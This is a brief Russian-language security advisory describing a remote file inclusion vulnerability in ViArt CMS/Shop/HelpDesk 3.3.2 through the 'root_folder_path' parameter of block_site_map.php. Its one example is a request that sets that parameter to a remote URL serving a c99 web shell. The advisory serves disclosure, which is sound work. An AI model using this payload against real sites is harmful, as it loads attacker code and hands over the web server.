Программа: ViArt CMS/Shop/HelpDesk 3.3.2

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «root_folder_path» сценарием block_site_map.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

www.RxH.com/viart_cms-3.3.2/blocks/block_site_map.php? root_folder_path=http://no-hack.fr/shell/c99.txt?



Оставить мнение